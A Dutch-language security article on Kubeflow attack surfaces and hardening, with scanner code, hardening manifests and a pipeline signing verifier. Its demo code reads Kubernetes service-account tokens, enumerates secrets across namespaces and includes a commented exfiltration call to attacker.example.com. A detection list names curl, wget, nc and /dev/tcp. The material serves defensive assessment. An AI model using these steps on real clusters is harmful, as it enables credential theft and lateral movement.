Kubeflow Security
Beveiligingsbeoordeling en hardening van Kubeflow ML-pijplijndeployments op Kubernetes.
Overzicht
Kubeflow is een open-source ML-platform gebouwd op Kubernetes dat componenten biedt voor elke fase van de ML-levenscyclus: notebookservers voor experimenteren, Kubeflow Pipelines voor workflow-orkestratie, KServe (voorheen KFServing) voor model serving, Katib voor hyperparameter-tuning, en een training operator voor gedistribueerde training. Elk component draait als een Kubernetes-deployment met zijn eigen serviceaccount, netwerkblootstelling en toegang tot clusterresources.
De beveiligingsuitdaging bij Kubeflow is dat het een complex multi-component ML-platform legt bovenop een toch al complexe Kubernetes-infrastructuur. Elk component introduceert zijn eigen aanvalsoppervlak, en de interacties tussen componenten creëren aanvullende risico's. Een gecompromitteerde notebookserver kan pijplijn-secrets benaderen, een kwaadaardige pijplijnstap kan trainingsdata exfiltreren, en een kwetsbare KServe-deployment kan vergiftigde modellen serveren.
Kubeflow-deployments zijn het onderwerp geweest van praktijkaanvallen. In 2020 rapporteerde Microsoft dat aanvallers zich richtten op verkeerd geconfigureerde Kubeflow-dashboards die aan het internet waren blootgesteld, om cryptocurrency-miners in te zetten op de onderliggende Kubernetes-clusters. Het fundamentele probleem was hetzelfde als bij MLflow: de standaarddeployment geeft prioriteit aan het gemak van de ontwikkelaar boven beveiliging, en veel organisaties zetten Kubeflow in zonder het te harden.
Dit artikel behandelt het aanvalsoppervlak van elk Kubeflow-component, biedt praktische beoordelingstechnieken en beschrijft de hardening-stappen die vereist zijn voor productiedeployments. De hier beschreven aanvallen sluiten aan op de MITRE ATLAS-technieken voor exploitatie van ML-infrastructuur.
Kubeflow-architectuur en aanvalsoppervlak
Componentenkaart
┌──────────────────────────────────────────────────────────┐
│ Kubeflow Dashboard │
│ (Istio VirtualService / Ingress) │
├──────────┬──────────┬──────────┬──────────┬──────────────┤
│ Notebook │ Pipeline │ KServe │ Katib │ Training │
│ Servers │ Service │ (Serving)│ (HPO) │ Operator │
├──────────┴──────────┴──────────┴──────────┴──────────────┤
│ Kubernetes Cluster (RBAC, NetworkPolicy) │
├──────────────────────────────────────────────────────────┤
│ Storage (PVCs, S3, MinIO) + GPU Resources │
└──────────────────────────────────────────────────────────┘
Elk component heeft zijn eigen aanvalsoppervlak:
| Component | Aanvalsoppervlak | Belangrijkste risico's |
|---|---|---|
| Central Dashboard | Web-UI, Istio-ingress | Authenticatie-bypass, SSRF |
| Notebookservers | Jupyter-omgevingen met clustertoegang | Code-uitvoering, laterale beweging |
| Pipelines | Argo Workflows, pijplijndefinities | Pijplijninjectie, secret-exfiltratie |
| KServe | Inferentie-endpoints voor model serving | Modelvergiftiging, DoS |
| Katib | Controller voor hyperparameter-tuning | Resource-uitputting, config-manipulatie |
| Training Operator | TFJob, PyTorchJob, MPIJob | Privilege-escalatie via trainingspods |
Authenticatie en multi-tenancy
Kubeflow gebruikt Istio voor netwerkroutering en integreert optioneel met Dex of OIDC-providers voor authenticatie. Multi-tenancy wordt geïmplementeerd via Kubernetes-namespaces — elke gebruiker of elk team krijgt een profiel dat mapt naar een namespace.
import subprocess
import json
from typing import Dict, List, Any
class KubeflowSecurityScanner:
"""Scan a Kubeflow deployment for security misconfigurations."""
def __init__(self, namespace: str = "kubeflow"):
self.namespace = namespace
def _kubectl(self, *args) -> str:
"""Run a kubectl command and return output."""
result = subprocess.run(
["kubectl", *args],
capture_output=True, text=True, timeout=30,
)
return result.stdout
def check_dashboard_exposure(self) -> Dict[str, Any]:
"""Check if the Kubeflow dashboard is externally accessible."""
# Controleer op LoadBalancer- of NodePort-services
services = json.loads(
self._kubectl("get", "svc", "-n", "istio-system", "-o", "json")
)
findings = []
for svc in services.get("items", []):
svc_type = svc.get("spec", {}).get("type", "ClusterIP")
name = svc.get("metadata", {}).get("name", "")
if svc_type in ("LoadBalancer", "NodePort"):
external_ip = None
if svc_type == "LoadBalancer":
ingress = svc.get("status", {}).get("loadBalancer", {}).get("ingress", [])
if ingress:
external_ip = ingress[0].get("ip") or ingress[0].get("hostname")
findings.append({
"service": name,
"type": svc_type,
"external_ip": external_ip,
"severity": "high",
"finding": f"Istio service '{name}' is externally accessible via {svc_type}",
})
return {"findings": findings}
def check_rbac_permissions(self) -> List[Dict]:
"""Audit RBAC permissions for Kubeflow service accounts."""
findings = []
# Haal alle serviceaccounts in de kubeflow-namespace op
sa_json = json.loads(
self._kubectl("get", "sa", "-n", self.namespace, "-o", "json")
)
for sa in sa_json.get("items", []):
sa_name = sa.get("metadata", {}).get("name", "")
# Controleer wat elke serviceaccount mag doen
result = subprocess.run(
["kubectl", "auth", "can-i", "--list",
f"--as=system:serviceaccount:{self.namespace}:{sa_name}"],
capture_output=True, text=True, timeout=30,
)
# Controleer op gevaarlijke permissies
dangerous_perms = ["*", "secrets", "pods/exec", "create pods"]
for line in result.stdout.split("\n"):
for perm in dangerous_perms:
if perm in line.lower():
findings.append({
"service_account": sa_name,
"permission": line.strip(),
"severity": "high",
"finding": f"Service account '{sa_name}' has elevated permission",
})
return findings
def check_network_policies(self) -> Dict[str, Any]:
"""Check for network policy enforcement."""
policies = json.loads(
self._kubectl("get", "networkpolicy", "-n", self.namespace, "-o", "json")
)
policy_count = len(policies.get("items", []))
if policy_count == 0:
return {
"severity": "high",
"finding": "No NetworkPolicies in kubeflow namespace",
"detail": "All pods can communicate freely with each other and external services",
"remediation": "Apply default-deny NetworkPolicy and whitelist required traffic",
}
return {
"severity": "info",
"finding": f"{policy_count} NetworkPolicies found",
"policies": [
p.get("metadata", {}).get("name") for p in policies.get("items", [])
],
}Exploitatie van notebookservers
Aanvalsvector: van notebook naar cluster
Kubeflow-notebookservers zijn Jupyter-omgevingen die als Kubernetes-pods draaien. Ze zijn bedoeld voor data-science-experimenten, maar ze vormen een krachtig aanvalsplatform omdat:
- Ze draaien met een serviceaccount dat mogelijk brede Kubernetes-API-toegang heeft
- Ze PersistentVolumeClaims kunnen mounten die trainingsdata bevatten
- Ze netwerktoegang hebben tot andere Kubeflow-services
- Ze van nature willekeurige code kunnen uitvoeren
"""
Demonstration: Lateral movement from a compromised Kubeflow notebook server.
This shows what an attacker can do after gaining access to a notebook.
"""
import subprocess
import json
from typing import List, Dict
class NotebookLateralMovement:
"""Assess lateral movement paths from a Kubeflow notebook server."""
def discover_service_account(self) -> Dict:
"""Discover the service account token mounted in this pod."""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
try:
with open(token_path) as f:
token = f.read().strip()
with open(namespace_path) as f:
namespace = f.read().strip()
return {
"has_token": True,
"namespace": namespace,
"token_preview": token[:20] + "...",
}
except FileNotFoundError:
return {"has_token": False}
def enumerate_accessible_secrets(self) -> List[Dict]:
"""List Kubernetes secrets accessible from this notebook."""
result = subprocess.run(
["kubectl", "get", "secrets", "-o", "json"],
capture_output=True, text=True, timeout=30,
)
if result.returncode != 0:
return [{"error": "Cannot list secrets", "detail": result.stderr}]
secrets = json.loads(result.stdout)
return [
{
"name": s.get("metadata", {}).get("name"),
"type": s.get("type"),
"namespace": s.get("metadata", {}).get("namespace"),
}
for s in secrets.get("items", [])
]
def enumerate_pipeline_artifacts(self) -> List[Dict]:
"""Discover pipeline artifacts accessible from this notebook."""
# Controleer op MinIO-credentials (vaak gebruikt door Kubeflow Pipelines)
minio_creds = {}
try:
result = subprocess.run(
["kubectl", "get", "secret", "mlpipeline-minio-artifact",
"-o", "json"],
capture_output=True, text=True, timeout=30,
)
if result.returncode == 0:
secret = json.loads(result.stdout)
minio_creds = {
"found": True,
"keys": list(secret.get("data", {}).keys()),
}
except Exception:
minio_creds = {"found": False}
return [{"minio_credentials": minio_creds}]
def check_cross_namespace_access(self, target_namespace: str) -> Dict:
"""Test if this notebook can access resources in other namespaces."""
checks = {}
# Probeer pods in een andere namespace op te sommen
result = subprocess.run(
["kubectl", "get", "pods", "-n", target_namespace],
capture_output=True, text=True, timeout=30,
)
checks["list_pods"] = result.returncode == 0
# Probeer secrets in een andere namespace op te sommen
result = subprocess.run(
["kubectl", "get", "secrets", "-n", target_namespace],
capture_output=True, text=True, timeout=30,
)
checks["list_secrets"] = result.returncode == 0
return {
"target_namespace": target_namespace,
"cross_namespace_access": checks,
"severity": "critical" if any(checks.values()) else "info",
}Notebookservers harden
# Example: Restricted PodSecurityPolicy for Kubeflow notebooks
# Apply via Kubernetes admission controller or OPA/Gatekeeper
apiVersion: v1
kind: Pod
metadata:
name: notebook-security-example
namespace: kubeflow-user-namespace
spec:
serviceAccountName: restricted-notebook-sa
securityContext:
runAsNonRoot: true
runAsUser: 1000
fsGroup: 100
seccompProfile:
type: RuntimeDefault
containers:
- name: notebook
image: kubeflownotebookswg/jupyter:latest
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: false # Jupyter needs write access
capabilities:
drop:
- ALL
resources:
limits:
cpu: "4"
memory: "8Gi"
nvidia.com/gpu: "1"
requests:
cpu: "1"
memory: "2Gi"
volumeMounts:
- name: workspace
mountPath: /home/jovyan
volumes:
- name: workspace
persistentVolumeClaim:
claimName: user-workspace-pvcPijplijnbeveiliging
Injectie van pijplijndefinities
Kubeflow Pipelines worden gedefinieerd als Python-functies met de KFP SDK en gecompileerd tot Argo Workflow-specificaties (YAML). Als een aanvaller een pijplijndefinitie kan wijzigen, kan hij willekeurige code injecteren die draait met de permissies van de serviceaccount van de pijplijn.
"""
Demonstration: How pipeline definition injection works.
A malicious pipeline step can exfiltrate data or credentials.
"""
from kfp import dsl
from kfp.dsl import component
# Legitiem pijplijncomponent
@component(base_image="python:3.11-slim")
def train_model(data_path: str, model_path: str) -> str:
"""Normal training step."""
# ... legitimate training code ...
return model_path
# Geïnjecteerd kwaadaardig component — kan worden toegevoegd door de pijplijnbron te wijzigen
@component(base_image="python:3.11-slim", packages_to_install=["requests"])
def exfiltrate_secrets() -> str:
"""
Malicious component that exfiltrates Kubernetes secrets.
This demonstrates the risk of pipeline injection.
"""
import subprocess
import requests
# Lees de serviceaccount-token
with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
token = f.read()
# Enumereer secrets via de Kubernetes-API
result = subprocess.run(
["wget", "-qO-", "--header", f"Authorization: Bearer {token}",
"https://kubernetes.default.svc/api/v1/secrets"],
capture_output=True, text=True,
)
# Bij een echte aanval zou dit worden geëxfiltreerd naar een externe server
# requests.post("https://attacker.example.com/collect", data=result.stdout)
return "done"
# Pijplijn met geïnjecteerde stap
@dsl.pipeline(name="compromised-pipeline")
def compromised_pipeline(data_path: str = "s3://data/train"):
# Legitieme stap
train_task = train_model(data_path=data_path, model_path="s3://models/output")
# Geïnjecteerde stap — draait met de permissies van de pijplijn-serviceaccount
# Dit zou worden verborgen in een grote pijplijndefinitie
exfil_task = exfiltrate_secrets()
exfil_task.after(train_task)Pijplijndefinities beveiligen
- Onderteken pijplijndefinities en verifieer de handtekeningen vóór uitvoering
- Bekijk de pijplijn-YAML op onverwachte container images of commando's
- Beperk de permissies van de pijplijn-serviceaccount tot het minimaal vereiste
- Gebruik admission controllers om pijplijnen te blokkeren die naar ongeautoriseerde images verwijzen
import hashlib
import hmac
import json
from typing import Dict
class PipelineIntegrityVerifier:
"""Verify the integrity of Kubeflow pipeline definitions."""
def __init__(self, signing_key: bytes):
self.signing_key = signing_key
def sign_pipeline(self, pipeline_yaml: str) -> str:
"""Create an HMAC signature for a pipeline definition."""
return hmac.new(
self.signing_key,
pipeline_yaml.encode(),
hashlib.sha256,
).hexdigest()
def verify_pipeline(self, pipeline_yaml: str, expected_signature: str) -> bool:
"""Verify a pipeline definition's signature."""
actual_signature = self.sign_pipeline(pipeline_yaml)
return hmac.compare_digest(actual_signature, expected_signature)
def scan_pipeline_for_risks(self, pipeline_spec: Dict) -> list:
"""Scan a compiled pipeline spec for security risks."""
risks = []
templates = pipeline_spec.get("spec", {}).get("templates", [])
allowed_images = {
"python:3.11-slim",
"gcr.io/ml-pipeline/", # Prefix matching
}
for template in templates:
container = template.get("container", {})
image = container.get("image", "")
# Controleer op ongeautoriseerde images
if not any(image.startswith(allowed) for allowed in allowed_images):
risks.append({
"risk": "unauthorized_image",
"template": template.get("name"),
"image": image,
"severity": "high",
})
# Controleer op privilege-escalatie
security_ctx = container.get("securityContext", {})
if security_ctx.get("privileged", False):
risks.append({
"risk": "privileged_container",
"template": template.get("name"),
"severity": "critical",
})
# Controleer op verdachte commando's
commands = container.get("command", []) + container.get("args", [])
suspicious = ["curl", "wget", "nc", "ncat", "/dev/tcp"]
for cmd in commands:
for susp in suspicious:
if susp in str(cmd):
risks.append({
"risk": "suspicious_command",
"template": template.get("name"),
"command": cmd,
"severity": "medium",
})
return risksKServe-beveiliging
KServe (voorheen KFServing) is het model-serving-component van Kubeflow. Het zet modellen in als Kubernetes-services met autoscaling, canary-deployments en ondersteuning voor inferentiegrafen.
Belangrijkste beveiligingszorgen
- Inferentie-endpoints kunnen worden blootgesteld zonder authenticatie
- Credentials voor modelopslag worden opgeslagen als Kubernetes-secrets
- Custom predictor-containers kunnen willekeurige code bevatten
- Inferentiegrafen schakelen meerdere services aaneen, wat de blast radius van één enkele compromittering vergroot
#!/bin/bash
# Audit KServe inference services for security issues
echo "=== KServe Security Audit ==="
# List all InferenceServices across namespaces
echo "[*] InferenceServices:"
kubectl get inferenceservice --all-namespaces -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for item in data.get('items', []):
name = item['metadata']['name']
ns = item['metadata']['namespace']
url = item.get('status', {}).get('url', 'N/A')
print(f' {ns}/{name}: {url}')
"
# Check if InferenceServices are exposed externally
echo "[*] External exposure:"
kubectl get svc -n istio-system -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for svc in data.get('items', []):
if svc['spec'].get('type') in ('LoadBalancer', 'NodePort'):
name = svc['metadata']['name']
svc_type = svc['spec']['type']
print(f' WARNING: {name} is exposed via {svc_type}')
"
# Check for model storage secrets
echo "[*] Model storage secrets:"
kubectl get secrets --all-namespaces -o json | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for secret in data.get('items', []):
name = secret['metadata']['name']
if any(kw in name.lower() for kw in ['storage', 'model', 's3', 'gcs', 'azure']):
ns = secret['metadata']['namespace']
print(f' {ns}/{name} (type: {secret.get(\"type\", \"unknown\")})')
"Netwerkbeleid
Default-deny met selectieve allow
Pas netwerkbeleid toe om communicatie tussen Kubeflow-componenten te beperken:
# Default deny all ingress/egress in Kubeflow namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: kubeflow
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
---
# Allow Kubeflow dashboard to reach pipeline service
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-dashboard-to-pipelines
namespace: kubeflow
spec:
podSelector:
matchLabels:
app: ml-pipeline
ingress:
- from:
- podSelector:
matchLabels:
app: centraldashboard
ports:
- protocol: TCP
port: 8888
---
# Allow pipeline pods to access artifact storage
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-pipeline-to-minio
namespace: kubeflow
spec:
podSelector:
matchLabels:
app: minio
ingress:
- from:
- podSelector:
matchLabels:
pipelines.kubeflow.org/enabled: "true"
ports:
- protocol: TCP
port: 9000Verdedigingsaanbevelingen
- Stel het Kubeflow-dashboard nooit bloot aan het internet — gebruik een VPN of een identity-aware proxy
- Schakel Istio strict mTLS in voor alle communicatie tussen services
- Pas least-privilege RBAC toe op alle Kubeflow-serviceaccounts, vooral notebook- en pijplijn-serviceaccounts
- Implementeer NetworkPolicies met default-deny en expliciete allow-regels
- Onderteken en verifieer pijplijndefinities vóór uitvoering
- Beperk container images in pijplijnen tot een goedgekeurd register met een admission controller
- Audit cross-namespace-toegang regelmatig — notebookservers zouden geen toegang moeten hebben tot de namespaces van andere gebruikers
- Monitor op afwijkend resourcegebruik dat kan wijzen op cryptomining of data-exfiltratie
- Gebruik OPA/Gatekeeper-policies om beveiligingsbeperkingen af te dwingen op alle Kubeflow-workloads
Referenties
- Microsoft Security Blog — "Cryptomining campaigns targeting Kubeflow" (2020) — real-world attack on misconfigured Kubeflow deployments
- Kubeflow Security Documentation — https://www.kubeflow.org/docs/started/security/
- Kubeflow Pipelines — https://www.kubeflow.org/docs/components/pipelines/
- KServe Documentation — https://kserve.github.io/website/
- MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise), AML.T0040 (ML-Enabled Product/Service)
- NIST AI RMF — Govern 1.7 (AI system isolation), Map 3.4 (AI deployment risks)